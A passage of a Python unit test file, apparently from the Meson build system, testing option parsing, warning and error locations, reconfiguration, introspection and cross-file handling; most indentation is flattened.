self.assertFalse(os.path.isfile(promoted_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'athing'], cwd=workdir)
self.assertTrue(os.path.isfile(promoted_wrap))
self.init(workdir)
self.build()
def test_subproject_promotion_wrap(self):
testdir = os.path.join(self.unit_test_dir, '44 promote wrap')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
ambiguous_wrap = os.path.join(spdir, 'ambiguous.wrap')
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'ambiguous'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isfile(ambiguous_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/ambiguous.wrap'], cwd=workdir)
self.assertTrue(os.path.isfile(ambiguous_wrap))
def test_warning_location(self):
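        '''Test that configure-time warnings report the meson.build file and
        line that triggered them, with paths relative to the working directory.'''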
tdir = os.path.join(self.unit_test_dir, '22 warning location')
out = self.init(tdir)
for expected in [
r'meson.build:4: WARNING: Keyword argument "link_with" defined multiple times.',
r'sub' + os.path.sep + r'meson.build:3: WARNING: Keyword argument "link_with" defined multiple times.',
r'meson.build:6: WARNING: a warning of some sort',
r'sub' + os.path.sep + r'meson.build:4: WARNING: subdir warning',
r'meson.build:7: WARNING: Module unstable-simd has no backwards or forwards compatibility and might not exist in future releases.',
r"meson.build:11: WARNING: The variable(s) 'MISSING' in the input file 'conf.in' are not present in the given configuration data.",
r'meson.build:1: WARNING: Passed invalid keyword argument "invalid".',
]:
self.assertRegex(out, re.escape(expected))
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
self.new_builddir()
out = self.init(tdir, workdir=wd)
expected = os.path.join(relpath(tdir, self.src_root), 'meson.build')
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, out)
def test_error_location_path(self):
'''Test locations in meson errors contain correct paths'''
# this list contains errors from all the different steps in the
# lexer/parser/interpreter we have tests for.
for (t, f) in [
('10 out of bounds', 'meson.build'),
('18 wrong plusassign', 'meson.build'),
('61 bad option argument', 'meson_options.txt'),
('100 subdir parse error', os.path.join('subdir', 'meson.build')),
('101 invalid option file', 'meson_options.txt'),
]:
tdir = os.path.join(self.src_root, 'test cases', 'failing', t)
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
try:
self.init(tdir, workdir=wd)
except subprocess.CalledProcessError as e:
expected = os.path.join('test cases', 'failing', t, f)
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, e.output)
else:
self.fail('configure unexpectedly succeeded')
def test_permitted_method_kwargs(self):
tdir = os.path.join(self.unit_test_dir, '25 non-permitted kwargs')
out = self.init(tdir)
for expected in [
r'WARNING: Passed invalid keyword argument "prefixxx".',
r'WARNING: Passed invalid keyword argument "argsxx".',
r'WARNING: Passed invalid keyword argument "invalidxx".',
]:
self.assertRegex(out, re.escape(expected))
def test_templates(self):
ninja = detect_ninja()
if ninja is None:
raise unittest.SkipTest('This test currently requires ninja. Fix this once "meson build" works.')
langs = ['c']
env = get_fake_env()
try:
env.detect_cpp_compiler(MachineChoice.HOST)
langs.append('cpp')
except EnvironmentException:
pass
try:
env.detect_cs_compiler(MachineChoice.HOST)
langs.append('cs')
except EnvironmentException:
pass
try:
env.detect_d_compiler(MachineChoice.HOST)
langs.append('d')
except EnvironmentException:
pass
try:
env.detect_java_compiler(MachineChoice.HOST)
langs.append('java')
except EnvironmentException:
pass
try:
env.detect_cuda_compiler(MachineChoice.HOST)
langs.append('cuda')
except EnvironmentException:
pass
try:
env.detect_fortran_compiler(MachineChoice.HOST)
langs.append('fortran')
except EnvironmentException:
pass
try:
env.detect_objc_compiler(MachineChoice.HOST)
langs.append('objc')
except EnvironmentException:
pass
try:
env.detect_objcpp_compiler(MachineChoice.HOST)
langs.append('objcpp')
except EnvironmentException:
pass
# FIXME: omitting rust as Windows AppVeyor CI finds Rust but doesn't link correctly
for lang in langs:
for target_type in ('executable', 'library'):
# test empty directory
with tempfile.TemporaryDirectory() as tmpdir:
self._run(self.meson_command + ['init', '--language', lang, '--type', target_type],
workdir=tmpdir)
self._run(self.setup_command + ['--backend=ninja', 'builddir'],
workdir=tmpdir)
self._run(ninja,
workdir=os.path.join(tmpdir, 'builddir'))
# test directory with existing code file
if lang in ('c', 'cpp'):
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'foo.' + lang), 'w') as f:
f.write('int main(void) {}')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
# The test uses mocking and thus requires that
# the current process is the one to run the Meson steps.
# If we are using an external test executable (most commonly
# in Debian autopkgtests) then the mocking won't work.
@unittest.skipIf('MESON_EXE' in os.environ, 'MESON_EXE is defined, can not use mocking.')
def test_cross_file_system_paths(self):
if is_windows():
raise unittest.SkipTest('system crossfile paths not defined for Windows (yet)')
if is_sunos():
cc = 'gcc'
else:
cc = 'cc'
testdir = os.path.join(self.common_test_dir, '1 trivial')
cross_content = textwrap.dedent("""\
[binaries]
c = '/usr/bin/{}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'x86'
cpu = 'i686'
endian = 'little'
""".format(cc))
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
with mock.patch.dict(os.environ, {'XDG_DATA_HOME': d}):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with mock.patch.dict(os.environ, {'XDG_DATA_DIRS': d}):
os.environ.pop('XDG_DATA_HOME', None)
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, '.local', 'share', 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
# If XDG_DATA_HOME is set in the environment running the
            # tests this test will fail, so mock the environment, pop
# it, then test
with mock.patch.dict(os.environ):
os.environ.pop('XDG_DATA_HOME', None)
with mock.patch('mesonbuild.coredata.os.path.expanduser', lambda x: x.replace('~', d)):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
def test_compiler_run_command(self):
'''
The test checks that the compiler object can be passed to
run_command().
'''
testdir = os.path.join(self.unit_test_dir, '24 compiler run_command')
self.init(testdir)
def test_identical_target_name_in_subproject_flat_layout(self):
'''
Test that identical targets in different subprojects do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '177 identical target name in subproject flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_identical_target_name_in_subdir_flat_layout(self):
'''
Test that identical targets in different subdirs do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '186 same target name flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_flock(self):
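        '''Test that acquiring the build directory lock twice raises a
        MesonException.'''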
exception_raised = False
with tempfile.TemporaryDirectory() as tdir:
os.mkdir(os.path.join(tdir, 'meson-private'))
with BuildDirLock(tdir):
try:
with BuildDirLock(tdir):
pass
except MesonException:
exception_raised = True
self.assertTrue(exception_raised, 'Double locking did not raise exception.')
@unittest.skipIf(is_osx(), 'Test not applicable to OSX')
def test_check_module_linking(self):
"""
Test that link_with: a shared module issues a warning
https://github.com/mesonbuild/meson/issues/2865
(That an error is raised on OSX is exercised by test failing/78)
"""
tdir = os.path.join(self.unit_test_dir, '30 shared_mod linking')
out = self.init(tdir)
msg = ('''WARNING: target links against shared modules. This is not
recommended as it is not supported on some platforms''')
self.assertIn(msg, out)
def test_ndebug_if_release_disabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=release', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=1', subprocess.check_output(exe).strip())
def test_ndebug_if_release_enabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=debugoptimized', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=0', subprocess.check_output(exe).strip())
def test_guessed_linker_dependencies(self):
'''
Test that meson adds dependencies for libraries based on the final
linker command line.
'''
testdirbase = os.path.join(self.unit_test_dir, '29 guessed linker dependencies')
testdirlib = os.path.join(testdirbase, 'lib')
extra_args = None
libdir_flags = ['-L']
env = get_fake_env(testdirlib, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() in {'msvc', 'clang-cl', 'intel-cl'}:
# msvc-like compiler, also test it with msvc-specific flags
libdir_flags += ['/LIBPATH:', '-LIBPATH:']
else:
            # static libraries are not linkable with -l with msvc because meson installs them
            # as .a files, which unix_args_to_native will not recognize since it expects
            # libraries to use the .lib extension. For a DLL the import library is installed
            # as .lib. Thus for msvc this test needs to use shared libraries to test the path
            # resolving logic in the dependency generation code path.
extra_args = ['--default-library', 'static']
initial_builddir = self.builddir
initial_installdir = self.installdir
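        # For each supported library-dir flag: build and install the library, then
        # configure an executable that only learns the library location via LDFLAGS,
        # so meson has to deduce the dependency from the final linker command line.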
for libdir_flag in libdir_flags:
# build library
self.new_builddir()
self.init(testdirlib, extra_args=extra_args)
self.build()
self.install()
libbuilddir = self.builddir
installdir = self.installdir
libdir = os.path.join(self.installdir, self.prefix.lstrip('/').lstrip('\\'), 'lib')
# build user of library
self.new_builddir()
# replace is needed because meson mangles platform paths passed via LDFLAGS
self.init(os.path.join(testdirbase, 'exe'),
override_envvars={"LDFLAGS": '{}{}'.format(libdir_flag, libdir.replace('\\', '/'))})
self.build()
self.assertBuildIsNoop()
# rebuild library
exebuilddir = self.builddir
self.installdir = installdir
self.builddir = libbuilddir
# Microsoft's compiler is quite smart about touching import libs on changes,
# so ensure that there is actually a change in symbols.
self.setconf('-Dmore_exports=true')
self.build()
self.install()
# no ensure_backend_detects_changes needed because self.setconf did that already
            # assert that the user of the library will be rebuilt
self.builddir = exebuilddir
self.assertRebuiltTarget('app')
            # restore dirs for the next test case
            self.installdir = initial_installdir
            self.builddir = initial_builddir
def test_conflicting_d_dash_option(self):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
with self.assertRaises(subprocess.CalledProcessError) as e:
self.init(testdir, extra_args=['-Dbindir=foo', '--bindir=bar'])
        # Just to ensure that we caught the correct error
        self.assertIn('as both', e.exception.output)
def _test_same_option_twice(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir, extra_args=args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice(self):
self._test_same_option_twice('bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice(self):
self._test_same_option_twice('bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice(self):
self._test_same_option_twice('one', ['-Done=foo', '-Done=bar'])
def _test_same_option_twice_configure(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir)
self.setconf(args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'one', ['-Done=foo', '-Done=bar'])
def test_command_line(self):
testdir = os.path.join(self.unit_test_dir, '34 command line')
# Verify default values when passing no args that affect the
# configuration, and as a bonus, test that --profile-self works.
self.init(testdir, extra_args=['--profile-self'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'static')
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.assertEqual(obj.user_options['set_sub_opt'].value, True)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'default3')
self.wipe()
# warning_level is special, it's --warnlevel instead of --warning-level
# for historical reasons
self.init(testdir, extra_args=['--warnlevel=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('--warnlevel=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# But when using -D syntax, it should be 'warning_level'
self.init(testdir, extra_args=['-Dwarning_level=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('-Dwarning_level=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# Mixing --option and -Doption is forbidden
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf(['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.wipe()
# --default-library should override default value from project()
self.init(testdir, extra_args=['--default-library=both'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'both')
self.setconf('--default-library=shared')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
if self.backend is Backend.ninja:
# reconfigure target works only with ninja backend
self.build('reconfigure')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
self.wipe()
# Should warn on unknown options
out = self.init(testdir, extra_args=['-Dbad=1', '-Dfoo=2', '-Dwrong_link_args=foo'])
self.assertIn('Unknown options: "bad, foo, wrong_link_args"', out)
self.wipe()
# Should fail on malformed option
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['-Dfoo'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf('-Dfoo')
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.wipe()
        # It is not an error to set a wrong option for an unknown subproject or
        # language, because we have no control over which ones will be selected.
self.init(testdir, extra_args=['-Dc_wrong=1', '-Dwrong:bad=1', '-Db_wrong=1'])
self.wipe()
# Test we can set subproject option
self.init(testdir, extra_args=['-Dsubp:subp_opt=foo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'foo')
self.wipe()
# c_args value should be parsed with split_args
self.init(testdir, extra_args=['-Dc_args=-Dfoo -Dbar "-Dthird=one two"'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c_args'].value, ['-Dfoo', '-Dbar', '-Dthird=one two'])
self.setconf('-Dc_args="foo bar" one two')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c_args'].value, ['foo bar', 'one', 'two'])
self.wipe()
self.init(testdir, extra_args=['-Dset_percent_opt=myoption%'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['set_percent_opt'].value, 'myoption%')
self.wipe()
        # Setting the same option a second time should override the first value
try:
self.init(testdir, extra_args=['--bindir=foo', '--bindir=bar',
'-Dbuildtype=plain', '-Dbuildtype=release',
'-Db_sanitize=address', '-Db_sanitize=thread',
'-Dc_args=-Dfoo', '-Dc_args=-Dbar'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'bar')
self.assertEqual(obj.builtins['buildtype'].value, 'release')
self.assertEqual(obj.base_options['b_sanitize'].value, 'thread')
self.assertEqual(obj.compiler_options.host['c_args'].value, ['-Dbar'])
self.setconf(['--bindir=bar', '--bindir=foo',
'-Dbuildtype=release', '-Dbuildtype=plain',
'-Db_sanitize=thread', '-Db_sanitize=address',
'-Dc_args=-Dbar', '-Dc_args=-Dfoo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'foo')
self.assertEqual(obj.builtins['buildtype'].value, 'plain')
self.assertEqual(obj.base_options['b_sanitize'].value, 'address')
self.assertEqual(obj.compiler_options.host['c_args'].value, ['-Dfoo'])
self.wipe()
except KeyError:
            # Ignore KeyError; it happens on CI for compilers that do not
            # support b_sanitize. We have to test with a base option because
            # base options used to fail this test with Meson 0.46 and earlier versions.
pass
def test_warning_level_0(self):
testdir = os.path.join(self.common_test_dir, '214 warning level 0')
# Verify default values when passing no args
self.init(testdir)
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ --warnlevel
self.init(testdir, extra_args=['--warnlevel=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('--warnlevel=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ -Dwarning_level
self.init(testdir, extra_args=['-Dwarning_level=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('-Dwarning_level=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
def test_feature_check_usage_subprojects(self):
testdir = os.path.join(self.unit_test_dir, '41 featurenew subprojects')
out = self.init(testdir)
# Parent project warns correctly
self.assertRegex(out, "WARNING: Project targeting '>=0.45'.*'0.47.0': dict")
# Subprojects warn correctly
self.assertRegex(out, r"\|WARNING: Project targeting '>=0.40'.*'0.44.0': disabler")
self.assertRegex(out, r"\|WARNING: Project targeting '!=0.40'.*'0.44.0': disabler")
# Subproject has a new-enough meson_version, no warning
self.assertNotRegex(out, "WARNING: Project targeting.*Python")
# Ensure a summary is printed in the subproject and the outer project
self.assertRegex(out, r"\|WARNING: Project specifies a minimum meson_version '>=0.40'")
self.assertRegex(out, r"\| \* 0.44.0: {'disabler'}")
self.assertRegex(out, "WARNING: Project specifies a minimum meson_version '>=0.45'")
self.assertRegex(out, " * 0.47.0: {'dict'}")
def test_configure_file_warnings(self):
testdir = os.path.join(self.common_test_dir, "14 configure file")
out = self.init(testdir)
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*'FOO_BAR'.*nosubst-nocopy2.txt.in.*not present.*")
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*empty configuration_data.*test.py.in")
# Warnings for configuration files that are overwritten.
self.assertRegex(out, "WARNING:.*\"double_output.txt\".*overwrites")
self.assertRegex(out, "WARNING:.*\"subdir.double_output2.txt\".*overwrites")
self.assertNotRegex(out, "WARNING:.*no_write_conflict.txt.*overwrites")
self.assertNotRegex(out, "WARNING:.*@BASENAME@.*overwrites")
self.assertRegex(out, "WARNING:.*\"sameafterbasename\".*overwrites")
# No warnings about empty configuration data objects passed to files with substitutions
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy1.txt.in")
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy2.txt.in")
with open(os.path.join(self.builddir, 'nosubst-nocopy1.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'/* #undef FOO_BAR */')
with open(os.path.join(self.builddir, 'nosubst-nocopy2.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'')
self.assertRegex(out, r"DEPRECATION:.*\['array'\] is invalid.*dict")
def test_dirs(self):
with tempfile.TemporaryDirectory() as containing:
with tempfile.TemporaryDirectory(dir=containing) as srcdir:
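                # Running setup from the source dir without naming a build directory
                # must fail, while running it from a build dir created inside the
                # source tree must succeed.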
mfile = os.path.join(srcdir, 'meson.build')
                with open(mfile, 'w') as of:
                    of.write("project('foobar', 'c')\n")
pc = subprocess.run(self.setup_command,
cwd=srcdir,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL)
self.assertIn(b'Must specify at least one directory name', pc.stdout)
with tempfile.TemporaryDirectory(dir=srcdir) as builddir:
subprocess.run(self.setup_command,
check=True,
cwd=builddir,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
def get_opts_as_dict(self):
result = {}
for i in self.introspect('--buildoptions'):
result[i['name']] = i['value']
return result
def test_buildtype_setting(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
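        # Disabling debug on its own should drop the buildtype to plain
        # with no optimization.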
self.setconf('-Ddebug=false')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['buildtype'], 'plain')
self.assertEqual(opts['optimization'], '0')
# Setting optimizations to 3 should cause buildtype
# to go to release mode.
self.setconf('-Doptimization=3')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'release')
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['optimization'], '3')
# Going to debug build type should reset debugging
# and optimization
self.setconf('-Dbuildtype=debug')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '0')
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_native_dep_pkgconfig(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = r'{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig.py'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
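        # The host (cross) pkg-config is the wrapper script from the cross file,
        # while PKG_CONFIG_LIBDIR controls what the native pkg-config can find.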
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_pkg_config_libdir(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = 'pkg-config'
[properties]
pkg_config_libdir = [r'{0}']
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
def __reconfigure(self, change_minor=False):
# Set an older version to force a reconfigure from scratch
filename = os.path.join(self.privatedir, 'coredata.dat')
with open(filename, 'rb') as f:
obj = pickle.load(f)
if change_minor:
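            # Bump only the last version component so the stored version still
            # counts as compatible.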
v = mesonbuild.coredata.version.split('.')
obj.version = '.'.join(v[0:2] + [str(int(v[2]) + 1)])
else:
obj.version = '0.47.0'
with open(filename, 'wb') as f:
pickle.dump(obj, f)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure()
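        # An outdated coredata version forces regeneration from scratch, but
        # previously configured options must be remembered.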
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertRegex(out, 'WARNING:.*Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
# Create a file in builddir and verify wipe command removes it
filename = os.path.join(self.builddir, 'something')
open(filename, 'w').close()
self.assertTrue(os.path.exists(filename))
out = self.init(testdir, extra_args=['--wipe', '-Dopt4=val4'])
self.assertFalse(os.path.exists(filename))
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 val4')
self.build()
self.run_tests()
    def test_wipe_from_builddir(self):
        testdir = os.path.join(self.common_test_dir, '161 custom target subdir depend files')
        self.init(testdir)
        self.__reconfigure()
        # Path() is not a chdir context manager, so change into the build
        # directory explicitly and restore the previous cwd afterwards.
        oldcwd = os.getcwd()
        try:
            os.chdir(self.builddir)
            self.init(testdir, extra_args=['--wipe'])
        finally:
            os.chdir(oldcwd)
def test_minor_version_does_not_reconfigure_wipe(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure(change_minor=True)
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertNotRegex(out, 'WARNING:.*Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
def test_target_construct_id_from_path(self):
# This id is stable but not guessable.
# The test is supposed to prevent unintentional
# changes of target ID generation.
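        # The leading field looks like a short hash derived from the subdir path,
        # followed by the target name and suffix.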
target_id = Target.construct_id_from_path('some/obscure/subdir',
'target-id', '@suffix')
self.assertEqual('5e002d3@@target-id@suffix', target_id)
target_id = Target.construct_id_from_path('subproject/foo/subdir/bar',
'target2-id', '@other')
self.assertEqual('81d46d1@@target2-id@other', target_id)
def test_introspect_projectinfo_without_configured_build(self):
testfile = os.path.join(self.common_test_dir, '35 run program', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'run command')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '43 options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'options')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '46 subproject options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'suboptions')
self.assertEqual(len(res['subprojects']), 1)
subproject_files = set(f.replace('\\', '/') for f in res['subprojects'][0]['buildsystem_files'])
self.assertEqual(subproject_files, set(['subprojects/subproject/meson_options.txt', 'subprojects/subproject/meson.build']))
self.assertEqual(res['subprojects'][0]['name'], 'subproject')
self.assertEqual(res['subprojects'][0]['version'], 'undefined')
self.assertEqual(res['subprojects'][0]['descriptive_name'], 'subproject')
def test_introspect_projectinfo_subprojects(self):
testdir = os.path.join(self.common_test_dir, '102 subproject subdir')
self.init(testdir)
res = self.introspect('--projectinfo')
expected = {
'descriptive_name': 'proj',
'version': 'undefined',
'subproject_dir': 'subprojects',
'subprojects': [
{
'descriptive_name': 'sub',
'name': 'sub',
'version': 'undefined'
}
]
}
self.assertDictEqual(res, expected)
def test_introspection_target_subproject(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir)
res = self.introspect('--targets')
expected = {
'sublib': 'sublib',
'simpletest': 'sublib',
'user': None
}
for entry in res:
name = entry['name']
self.assertEqual(entry['subproject'], expected[name])
def test_introspect_projectinfo_subproject_dir(self):
testdir = os.path.join(self.common_test_dir, '78 custom subproject dir')
self.init(testdir)
res = self.introspect('--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
def test_introspect_projectinfo_subproject_dir_from_source(self):
testfile = os.path.join(self.common_test_dir, '78 custom subproject dir', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
@skipIfNoExecutable('clang-format')
def test_clang_format(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-format is for now only supported on Ninja, not {}'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '54 clang-format')
testfile = os.path.join(testdir, 'prog.c')
badfile = os.path.join(testdir, 'prog_orig_c')
goodfile = os.path.join(testdir, 'prog_expected_c')
testheader = os.path.join(testdir, 'header.h')
badheader = os.path.join(testdir, 'header_orig_h')
goodheader = os.path.join(testdir, 'header_expected_h')
try:
shutil.copyfile(badfile, testfile)
shutil.copyfile(badheader, testheader)
self.init(testdir)
self.assertNotEqual(Path(testfile).read_text(),
Path(goodfile).read_text())
